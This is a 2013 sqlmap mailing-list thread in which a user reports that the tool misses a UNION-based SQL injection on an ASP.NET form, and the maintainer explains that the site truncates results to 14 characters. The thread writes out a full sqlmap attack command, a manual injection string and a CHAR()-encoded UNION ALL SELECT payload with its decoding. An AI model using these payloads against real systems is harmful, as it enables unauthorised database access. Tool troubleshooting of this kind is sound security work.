Re: [sqlmap-users] A simple injection case failing

Tue, 04 Jun 2013 14:57:30 -0700 

Hi.

That site is trimming results (seems to do it to 14 chars in length).

For example, request [#32]:

ParamterOne=-4230' UNION ALL SELECT
NULL,NULL,CHAR(58)+CHAR(106)+CHAR(117)+CHAR(103)+CHAR(58)+CHAR(75)+CHAR(108)+CHAR(101)+CHAR(113)+CHAR(75)+CHAR(89)+CHAR(67)+CHAR(120)+CHAR(113)+CHAR(116)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(114)+CHAR(58)--
&ParameterTwo=10,11,12,35,61

can be decoded to:

ParamterOne=-4230' UNION ALL SELECT NULL,NULL,*:jug:KleqKYCxqt:hor:*--
&ParameterTwo=10,11,12,35,61

while in response there is:
:jug:KleqKYCxq

In this kind of cases you'll need to (at least try to) exploit it manually.

Kind regards,
Miroslav Stampar


On Tue, Jun 4, 2013 at 10:47 AM, Stephen Shkardoon <s...@ss23.geek.nz>wrote:

> I have a case that sqlmap seems to be acting weird about. I've ran a
> 'sqlmap.py -u "myhost.com/TestFile.aspx"
> --data="ParameterOne=d&ParameterTwo=10,11,12,35,61" --dbms=mssql --hostname
> --technique=U --union-cols=3 -v 6 --flush-session --fresh-queries -t
> traffic_log.txt'
> Manually injecting with ParameterOne looking like "foo' UNION SELECT 1,2,3
> -- " works as expected. In fact, in the log, you can see it working fine in
> the case of request #32 and #36. However, sqlmap doesn't "find" this issue.
> Most of the queries seem to be doing something like "foo) UNION" instead.
> Is there a problem on my end here, or is sqlmap doing something weird or
> what?
>
> Running sqlmap/1.0-dev-3e0f747 (latest git).
>
> Thanks,
> Stephen
>
>
> ------------------------------------------------------------------------------
> How ServiceNow helps IT people transform IT departments:
> 1. A cloud service to automate IT design, transition and operations
> 2. Dashboards that offer high-level views of enterprise services
> 3. A single system of record for all IT processes
> http://p.sf.net/sfu/servicenow-d2d-j
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

------------------------------------------------------------------------------
How ServiceNow helps IT people transform IT departments:
1. A cloud service to automate IT design, transition and operations
2. Dashboards that offer high-level views of enterprise services
3. A single system of record for all IT processes
http://p.sf.net/sfu/servicenow-d2d-j
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to